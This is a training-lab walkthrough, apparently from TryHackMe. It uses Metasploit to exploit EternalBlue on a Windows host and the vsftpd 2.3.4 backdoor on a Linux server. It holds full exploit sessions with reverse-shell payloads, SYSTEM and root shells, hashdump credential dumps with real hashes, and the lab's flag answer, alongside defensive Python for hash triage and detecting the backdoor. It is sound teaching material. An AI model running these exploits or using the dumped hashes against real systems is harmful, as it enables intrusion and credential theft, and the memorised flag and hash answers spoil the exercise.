In the next tasks, we will exploit both targets using two fundamentally different exploits. The workflow is the same in both cases, but the exploits differ in protocol, target OS, vulnerability type, and session type. This is deliberate: the goal is to demonstrate that Metasploit's operational pattern, search → configure → exploit → interact, works regardless of the underlying technical details.

Answer the questions below

What auxiliary module checks if a target is vulnerable to MS17-010? auxiliary/scanner/smb/smb_ms17_010

msf > search type:auxiliary smb

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank    Check  Description
   -   ----                                                            ---------------  ----    -----  -----------
   0   auxiliary/server/capture/smb                                    .                normal  No     Authentication Capture: SMB
   1   auxiliary/scanner/http/citrix_dir_traversal                     2019-12-17       normal  No     Citrix ADC (NetScaler) Directory Traversal Scanner
   2   auxiliary/gather/crushftp_fileread_cve_2024_4040                .                normal  Yes    CrushFTP Unauthenticated Arbitrary File Read
   3   auxiliary/scanner/smb/impacket/dcomexec                         2018-03-19       normal  No     DCOM Exec
   4   auxiliary/scanner/smb/impacket/secretsdump                      .                normal  No     DCOM Exec
   5   auxiliary/scanner/dcerpc/dfscoerce                              .                normal  No     DFSCoerce
   6   auxiliary/server/relay/esc8                                     .                normal  Yes    ESC8 Relay: SMB to HTTP(S)
   7   auxiliary/server/http_ntlmrelay                                 .                normal  No     HTTP Client MS Credential Relayer
   8   auxiliary/fileformat/icon_environment_datablock_leak            2025-05-16       normal  No     IconEnvironmentDataBlock - Windows LNK File Special UNC Path NTLM Leak
   9   auxiliary/gather/konica_minolta_pwd_extract                     .                normal  No     Konica Minolta Password Extractor
   10  auxiliary/fileformat/odt_badodt                                 2018-05-01       normal  No     LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
   11  auxiliary/admin/smb/ms17_010_command                            2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   12    \_ AKA: ETERNALSYNERGY                                        .                .       .      .
   13    \_ AKA: ETERNALROMANCE                                        .                .       .      .
   14    \_ AKA: ETERNALCHAMPION                                       .                .       .      .
   15    \_ AKA: ETERNALBLUE                                           .                .       .      .
   16  auxiliary/scanner/smb/smb_ms17_010                              .                normal  Yes    MS17-010 SMB RCE Detection
   17    \_ AKA: DOUBLEPULSAR                                          .                .       .      .
   18    \_ AKA: ETERNALBLUE                                           .                .       .      .
   19  auxiliary/dos/windows/smb/ms05_047_pnp                          .                normal  No     Microsoft Plug and Play Service Registry Overflow
   20  auxiliary/dos/windows/smb/rras_vls_null_deref                   2006-06-14       normal  No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   21  auxiliary/admin/mssql/mssql_ntlm_stealer                        .                normal  No     Microsoft SQL Server NTLM Stealer
   22  auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                   .                normal  No     Microsoft SQL Server SQLi NTLM Stealer
   23  auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli           .                normal  No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   24  auxiliary/admin/mssql/mssql_enum_domain_accounts                .                normal  No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   25  auxiliary/dos/windows/smb/ms06_035_mailslot                     2006-07-11       normal  No     Microsoft SRV.SYS Mailslot Write Corruption
   26  auxiliary/dos/windows/smb/ms06_063_trans                        .                normal  No     Microsoft SRV.SYS Pipe Transaction No Null
   27  auxiliary/dos/windows/smb/ms09_001_write                        .                normal  No     Microsoft SRV.SYS WriteAndX Invalid DataOffset
   28  auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh       .                normal  No     Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   29  auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff          .                normal  No     Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
   30  auxiliary/dos/windows/smb/vista_negotiate_stop                  .                normal  No     Microsoft Vista SP0 SMB Negotiate Protocol DoS
   31  auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop      .                normal  No     Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
   32  auxiliary/scanner/smb/psexec_loggedin_users                     .                normal  No     Microsoft Windows Authenticated Logged In Users Enumeration
   33  auxiliary/dos/windows/smb/ms11_019_electbowser                  .                normal  No     Microsoft Windows Browser Pool DoS
   34  auxiliary/server/relay/smb_to_ldap                              .                normal  No     Microsoft Windows SMB to LDAP Relay
   35  auxiliary/server/relay/smb_to_mssql                             .                normal  No     Microsoft Windows SMB to MSSQL Relay
   36  auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow        .                normal  No     Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   37  auxiliary/fileformat/word_unc_injector                          .                normal  No     Microsoft Word UNC Path Injector
   38  auxiliary/spoof/nbns/nbns_response                              .                normal  No     NetBIOS Name Service Spoofer
   39  auxiliary/admin/oracle/ora_ntlm_stealer                         2009-04-07       normal  No     Oracle SMB Relay Code Execution
   40  auxiliary/scanner/dcerpc/petitpotam                             .                normal  No     PetitPotam
   41  auxiliary/admin/smb/psexec_ntdsgrab                             .                normal  No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   42  auxiliary/fileformat/environment_variable_datablock_leak        2025-05-06       normal  No     Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak
   43  auxiliary/scanner/sap/sap_smb_relay                             .                normal  No     SAP SMB Relay Abuse
   44  auxiliary/dos/sap/sap_soap_rfc_eps_delete_file                  .                normal  No     SAP SOAP EPS_DELETE_FILE File Deletion
   45  auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing    .                normal  No     SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
   46  auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence  .                normal  No     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
   47  auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                 .                normal  No     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
   48  auxiliary/fuzzers/smb/smb_create_pipe_corrupt                   .                normal  No     SMB Create Pipe Request Corruption
   49  auxiliary/fuzzers/smb/smb_create_pipe                           .                normal  No     SMB Create Pipe Request Fuzzer
   50  auxiliary/admin/smb/list_directory                              .                normal  No     SMB Directory Listing Utility
   51  auxiliary/scanner/smb/smb_enumusers_domain                      .                normal  No     SMB Domain User Enumeration
   52  auxiliary/admin/smb/delete_file                                 .                normal  No     SMB File Delete Utility
   53  auxiliary/admin/smb/download_file                               .                normal  No     SMB File Download Utility
   54  auxiliary/admin/smb/upload_file                                 .                normal  No     SMB File Upload Utility
   55  auxiliary/scanner/smb/smb_enum_gpp                              .                normal  No     SMB Group Policy Preference Saved Passwords Enumeration
   56  auxiliary/scanner/smb/smb_login                                 .                normal  No     SMB Login Check Scanner
   57  auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                   .                normal  No     SMB NTLMv1 Login Request Corruption
   58  auxiliary/fuzzers/smb/smb_negotiate_corrupt                     .                normal  No     SMB Negotiate Dialect Corruption
   59  auxiliary/fuzzers/smb/smb2_negotiate_corrupt                    .                normal  No     SMB Negotiate SMB2 Dialect Corruption
   60  auxiliary/admin/smb/change_password                             .                normal  No     SMB Password Change
   61    \_ action: CHANGE                                             .                .       .      Change the password, knowing the existing one. New AES kerberos keys will be generated.
   62    \_ action: CHANGE_NTLM                                        .                .       .      Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
   63    \_ action: RESET                                              .                .       .      Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated.
   64    \_ action: RESET_NTLM                                         .                .       .      Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
   65  auxiliary/scanner/smb/smb_lookupsid                             .                normal  No     SMB SID User Enumeration (LookupSid)
   66    \_ action: DOMAIN                                             .                .       .      Enumerate domain accounts
   67    \_ action: LOCAL                                              .                .       .      Enumerate local accounts
   68  auxiliary/admin/smb/check_dir_file                              .                normal  No     SMB Scanner Check File/Directory Utility
   69  auxiliary/scanner/smb/pipe_auditor                              .                normal  No     SMB Session Pipe Auditor
   70  auxiliary/scanner/smb/pipe_dcerpc_auditor                       .                normal  No     SMB Session Pipe DCERPC Auditor
   71  auxiliary/scanner/smb/smb_enumshares                            .                normal  No     SMB Share Enumeration
   72  auxiliary/fuzzers/smb/smb_tree_connect_corrupt                  .                normal  No     SMB Tree Connect Request Corruption
   73  auxiliary/fuzzers/smb/smb_tree_connect                          .                normal  No     SMB Tree Connect Request Fuzzer
   74  auxiliary/scanner/smb/smb_enumusers                             .                normal  No     SMB User Enumeration (SAM EnumUsers)
   75  auxiliary/scanner/smb/smb_version                               .                normal  No     SMB Version Detection
   76  auxiliary/server/relay/relay_get_naa_credentials                .                normal  Yes    SMB to HTTP relay version of Get NAA Creds
   77  auxiliary/dos/smb/smb_loris                                     2017-06-29       normal  No     SMBLoris NBSS Denial of Service
   78  auxiliary/scanner/snmp/snmp_enumshares                          .                normal  No     SNMP Windows SMB Share Enumeration
   79  auxiliary/admin/smb/samba_symlink_traversal                     .                normal  No     Samba Symlink Directory Traversal
   80  auxiliary/scanner/smb/smb_uninit_cred                           .                normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   81  auxiliary/dos/samba/read_nttrans_ea_list                        .                normal  No     Samba read_nttrans_ea_list Integer Overflow
   82  auxiliary/fileformat/specialfolder_leak                         2025-05-10       normal  No     SpecialFolderDatablock - Windows LNK File Special UNC Path NTLM Leak
   83  auxiliary/server/teamviewer_uri_smb_redirect                    .                normal  No     TeamViewer Unquoted URI Handler SMB Redirect
   84  auxiliary/scanner/smb/impacket/wmiexec                          2018-03-19       normal  No     WMI Exec
   85  auxiliary/admin/smb/webexec_command                             .                normal  No     WebEx Remote Command Execution Utility
   86  auxiliary/fileformat/multidrop                                  .                normal  No     Windows SMB Multi Dropper

After running a vulnerability scanner module, what msfconsole command displays the vulnerabilities stored in the database? vulns

Exploit 1: EternalBlue (MS17-010)

EternalBlue targets a buffer overflow vulnerability in Microsoft's SMBv1 implementation. We confirmed the host is vulnerable in the previous task. Let's exploit it.

Step 1: Search and Select

msf6 > search eternalblue type:exploit

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
[...]

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Metasploit selected windows/x64/meterpreter/reverse_tcp as the default payload. This is a staged Meterpreter payload that will give us a full-featured interactive session on the target.

Step 2: Configure

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

 Name           Current Setting  Required  Description
 ----           ---------------  --------  -----------
 RHOSTS         MACHINE_IP       yes       The target host(s), [...]
 RPORT          445              yes       The target port (TCP)
 [...]

Payload options (windows/x64/meterpreter/reverse_tcp):

 Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
 EXITFUNC  thread           yes       Exit technique [...]
 LHOST     ATTACKER_IP      yes       The listen address
 LPORT     4444             yes       The listen port

msf6 exploit(windows/smb/ms17_010_eternalblue) >

Verify that LHOST is set to your AttackBox or Kali machine's IP address. If it is not correct (common when multiple network interfaces are present), set it manually with set LHOST CONNECTION_IP.

Step 3: Exploit

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on CONNECTION_IP:4444
[*] MACHINE_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] MACHINE_IP:445 - Host is likely VULNERABLE to MS17-010!
[*] MACHINE_IP:445 - Connecting to target for exploitation.
[+] MACHINE_IP:445 - Connection established for exploitation.
[+] MACHINE_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] MACHINE_IP:445 - Trying exploit with 12 Groom Allocations.
[*] MACHINE_IP:445 - Sending all but last fragment of exploit packet
[*] Sending stage (201283 bytes) to MACHINE_IP
[*] Meterpreter session 1 opened (CONNECTION_IP:4444 -> MACHINE_IP:49186) at 2026-03-18 15:45:22 +0000

meterpreter >

We have a Meterpreter session on STRATFORD-WS01. Let's verify our access level and retrieve the flag:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag.txt
Found 1 result...
 c:\flag.txt (24 bytes)
meterpreter > cat c:\\Users\\Administrator\\Desktop\\flag.txt
THM-REDACTED
meterpreter >

We landed as NT AUTHORITY\SYSTEM, the highest privilege level on a Windows system. EternalBlue is a kernel-level exploit, so it bypasses normal user privilege boundaries entirely.

Let's also extract password hashes before moving on. The hashdump command retrieves local user account hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
meterpreter >

We can see a user account named pirate with an NTLM hash. We will explore hash cracking and post-exploitation in depth in the Post-Exploitation room. For now, background this session so we can exploit the second target:

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) >
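Before backgrounding, it is worth triaging what hashdump actually told us. The Python below is an added example, not code from the room or from Metasploit: it parses the pwdump-format lines hashdump prints (user:RID:LM:NT:::) and flags the states a reviewer cares about, using two well-known constants: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (LM hashing disabled, the modern default) and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The sample input is constructed: it reuses the pirate RID and hash from the run above and adds a made-up legacy account with a non-empty LM hash.

```python
"""Triage Meterpreter ``hashdump`` output (added example, not from the room)."""
import re
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" : LM disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" : blank password

# pwdump line: username:RID:LM_hash:NT_hash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class SamEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str


def parse_hashdump(text: str) -> list[SamEntry]:
    """Extract SAM entries; prompts and non-matching lines are ignored."""
    entries = []
    for raw in text.splitlines():
        m = PWDUMP_RE.match(raw.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]),
                                    m["lm"].lower(), m["nt"].lower()))
    return entries


def assess(entries: list[SamEntry]) -> dict[str, list[str]]:
    """Return findings keyed by account; accounts with nothing to report are omitted.

    hashdump does not show the account-disabled flag, so a blank NT hash on
    Guest is normally just the disabled default account: confirm with
    ``net user`` before reporting it.
    """
    findings: dict[str, list[str]] = {}
    for e in entries:
        notes = []
        if e.nt_hash == EMPTY_NT:
            notes.append("blank password")
        if e.lm_hash != EMPTY_LM:
            notes.append("LM hash stored (legacy LM hashing enabled)")
        if e.rid == 500 and e.user.lower() == "administrator":
            notes.append("built-in Administrator (RID 500) not renamed")
        if notes:
            findings[e.user] = notes
    return findings


# Constructed sample: the two constants, the pirate entry from the run above,
# and a made-up "legacy" account whose LM hash is still populated.
SAMPLE = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1003:aad3b435b51404eeaad3b435b51404ee:3b1da22b1973c0bb86d4a9b6a9ae65f6:::
legacy:1004:00112233445566778899aabbccddeeff:3b1da22b1973c0bb86d4a9b6a9ae65f6:::
meterpreter >
"""

if __name__ == "__main__":
    for user, notes in assess(parse_hashdump(SAMPLE)).items():
        print(f"{user}: {'; '.join(notes)}")
```

Run it as a script to print one line per flagged account; pirate has a non-empty NT hash and no LM hash, so it produces no finding on its own, which is exactly why the next step for that account is offline cracking rather than a configuration fix.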

Answer the questions below

What is the content of the flag.txt file on STRATFORD-WS01?

msf > search eternalblue type:exploit

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   20    \_ target: Execute payload (x64)             .                .        .      .
   21    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 21, use 21 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.113.138.21
RHOSTS => 10.113.138.21
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.113.138.21    yes       The target host(s), see
                                             https://docs.metasploit.
                                             com/docs/using-metasploi
                                             t/basics/using-metasploi
                                             t.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows d
                                             omain to use for authent
                                             ication. Only affects Wi
                                             ndows Server 2008 R2, Wi
                                             ndows 7, Windows Embedde
                                             d Standard 7 target mach
                                             ines.
   SMBPass                         no        (Optional) The password
                                             for the specified userna
                                             me
   SMBUser                         no        (Optional) The username
                                             to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architec
                                             ture matches exploit Tar
                                             get. Only affects Window
                                             s Server 2008 R2, Window
                                             s 7, Windows Embedded St
                                             andard 7 target machines
                                             .
   VERIFY_TARGET  true             yes       Check if remote OS match
                                             es exploit Target. Only
                                             affects Windows Server 2
                                             008 R2, Windows 7, Windo
                                             ws Embedded Standard 7 t
                                             arget machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '',
                                         seh, thread, process, none)
   LHOST     10.113.67.191    yes       The listen address (an interf
                                        ace may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.113.67.191:4444 
[*] 10.113.138.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.113.138.21:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 10.113.138.21:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.113.138.21:445 - The target is vulnerable.
[*] 10.113.138.21:445 - Connecting to target for exploitation.
[+] 10.113.138.21:445 - Connection established for exploitation.
[+] 10.113.138.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.113.138.21:445 - CORE raw buffer dump (53 bytes)
[*] 10.113.138.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.113.138.21:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 10.113.138.21:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
[*] 10.113.138.21:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 10.113.138.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.113.138.21:445 - Trying exploit with 12 Groom Allocations.
[*] 10.113.138.21:445 - Sending all but last fragment of exploit packet
[*] 10.113.138.21:445 - Starting non-paged pool grooming
[+] 10.113.138.21:445 - Sending SMBv2 buffers
[+] 10.113.138.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.113.138.21:445 - Sending final SMBv2 buffers.
[*] 10.113.138.21:445 - Sending last fragment of exploit packet!
[*] 10.113.138.21:445 - Receiving response from exploit packet
[+] 10.113.138.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.113.138.21:445 - Sending egg to corrupted connection.
[*] 10.113.138.21:445 - Triggering free of corrupted buffer.
[*] Sending stage (248902 bytes) to 10.113.138.21
[*] Meterpreter session 1 opened (10.113.67.191:4444 -> 10.113.138.21:49161) at 2026-05-25 19:14:17 +0000
[+] 10.113.138.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.113.138.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.113.138.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag.txt
Found 1 result...
=================

Path                                     Size (bytes)  Modified (UTC)
----                                     ------------  --------------
c:\Users\Administrator\Desktop\flag.txt  17            2026-04-24 05:37:47 +0000

meterpreter > cat c:\\Users\\Administrator\\Desktop\\flag.txt
THM{EterNalPwn3d} 

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cc37474302208881eac96efdb606b033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1003:aad3b435b51404eeaad3b435b51404ee:3b1da22b1973c0bb86d4a9b6a9ae65f6:::

What is the NTLM hash of the pirate user on STRATFORD-WS01?

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cc37474302208881eac96efdb606b033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1003:aad3b435b51404eeaad3b435b51404ee:3b1da22b1973c0bb86d4a9b6a9ae65f6:::

Exploit 2: vsftpd 2.3.4 Backdoor

Now for something completely different. In 2011, the vsftpd 2.3.4 source code distribution was found to contain a backdoor that an unknown attacker had inserted into the download archive. When a user connects to the FTP service and sends a username ending with :) (a smiley face), the backdoor opens a command shell listening on port 6200. This is not a buffer overflow or a logic flaw; it is deliberately planted malicious code.
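Seen from the defender's side, those same facts give three detection hooks: the service banner, the USER command carrying the trigger sequence, and a connection to TCP 6200. The Python below is an added example, not code from the room or from Metasploit. It classifies an FTP greeting, scans vsftpd log lines for USER commands containing ":)" (it flags the sequence anywhere in the name, which covers the trailing case described above), and picks out flow records whose destination port is 6200. The vsftpd log line shape (... FTP command: Client "<ip>", "USER <name>") is assumed from vsftpd's log_ftp_protocol output and should be checked against your own logs; the log lines and flow records are constructed, reusing the addresses from the run later on this page.

```python
"""Defender-side checks for the vsftpd 2.3.4 backdoor (added example, not from the room)."""
import re
from typing import Iterable, NamedTuple

# Greeting as seen in the room: "220 (vsFTPd 2.3.4)"
BANNER_RE = re.compile(r"^220 \(vsFTPd (\d+)\.(\d+)\.(\d+)\)\s*$")
# ASSUMED vsftpd log_ftp_protocol line shape; verify against real logs:
#   <date> [pid N] FTP command: Client "<ip>", "USER <name>"
USER_CMD_RE = re.compile(r'Client "([^"]+)", "USER ([^"]*)"')
TRIGGER = ":)"            # the two bytes (0x3a 0x29) that arm the backdoor
BACKDOOR_PORT = 6200      # where the planted shell listens once triggered


class Alert(NamedTuple):
    source: str
    reason: str


def classify_banner(banner: str) -> str:
    """Say whether an FTP greeting belongs to the backdoored release."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return "not a vsftpd banner"
    version = tuple(int(x) for x in m.groups())
    if version == (2, 3, 4):
        return "vsftpd 2.3.4: backdoored release, verify and replace"
    return "vsftpd %d.%d.%d" % version


def scan_ftp_log(lines: Iterable[str]) -> list[Alert]:
    """Flag USER commands containing the trigger sequence."""
    alerts = []
    for line in lines:
        m = USER_CMD_RE.search(line)
        if m and TRIGGER in m.group(2):
            alerts.append(Alert(m.group(1),
                                f"backdoor trigger in USER {m.group(2)!r}"))
    return alerts


def scan_connections(records: Iterable[tuple[str, str, int]],
                     port: int = BACKDOOR_PORT) -> list[Alert]:
    """Flag flow records (src_ip, dst_ip, dst_port) aimed at the shell port."""
    return [Alert(src, f"connection to {dst}:{dport} (backdoor shell port)")
            for src, dst, dport in records if dport == port]


# Constructed sample data; addresses reuse the ones from the run on this page.
SAMPLE_LOG = [
    'Mon May 25 19:51:33 2026 [pid 2] FTP command: Client "10.114.98.170", "USER anonymous"',
    'Mon May 25 19:51:33 2026 [pid 2] FTP command: Client "10.114.98.170", "USER backup:)"',
    'Mon May 25 19:51:34 2026 [pid 2] FTP command: Client "10.114.98.170", "PASS ****"',
]
SAMPLE_FLOWS = [
    ("10.114.98.170", "10.114.157.64", 21),
    ("10.114.98.170", "10.114.157.64", 6200),
]

if __name__ == "__main__":
    print(classify_banner("220 (vsFTPd 2.3.4)"))
    for a in scan_ftp_log(SAMPLE_LOG) + scan_connections(SAMPLE_FLOWS):
        print(f"{a.source}: {a.reason}")
```

The banner check is only a hint (the module's own output later says "backdoor may be present" for the same reason): the backdoor lived in one tampered tarball, so a 2.3.4 banner means "verify the binary", while a USER command with ":)" followed by traffic to 6200 from the same client is the trigger itself and deserves an alert regardless of what the banner says.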

Let's find the Metasploit module:

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

msf6 > use 1
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Notice two differences from EternalBlue. First, the rank is excellent (compared to EternalBlue's average), meaning this exploit is expected to work reliably without crashing the service. Second, the default payload is cmd/unix/interact, a basic interactive shell, not Meterpreter. This is because the backdoor opens a simple command channel, not a reflective DLL injection point.

Configure and Exploit:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] MACHINE_IP:21 - Banner: 220 (vsFTPd 2.3.4)
[*] MACHINE_IP:21 - USER: 331 Please specify the password.
[+] MACHINE_IP:21 - Backdoor service has been spawned, handling...
[+] MACHINE_IP:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (ATTACKER_IP:42069 -> MACHINE_IP:6200) at 2026-03-18 15:52:38 +0000

id
uid=0(root) gid=0(root)
whoami
root
hostname
stratford-srv01

We have root access on the Linux server. Notice the differences from the EternalBlue exploitation:

  • The prompt is a raw shell, not meterpreter >. There is no prompt prefix at all; we are interacting directly with the target's shell.

  • The session type is Command shell (session 2), not Meterpreter. No staged payload was downloaded.

  • The backdoor itself provided the command execution channel.

Comparing the Two Exploits

Dimension           EternalBlue                                   vsftpd 2.3.4
---------           -----------                                   ------------
Target service      SMB (port 445)                                FTP (port 21)
Target OS           Windows 7                                     Ubuntu Linux
Vulnerability type  Buffer overflow in SMBv1                      Planted backdoor in source code
Exploit rank        Average                                       Excellent
Default payload     windows/x64/meterpreter/reverse_tcp (staged)  cmd/unix/interact (single)
Session type        Meterpreter                                   Command shell
Privilege level     NT AUTHORITY\SYSTEM                           root
Check support       Yes                                           No

The comparison reinforces the core point: the Metasploit workflow is protocol-agnostic. Whether you are exploiting a Windows kernel vulnerability over SMB or triggering a backdoor in an FTP daemon on Linux, the operational steps are identical: search, use, set, exploit.

Answer the questions below

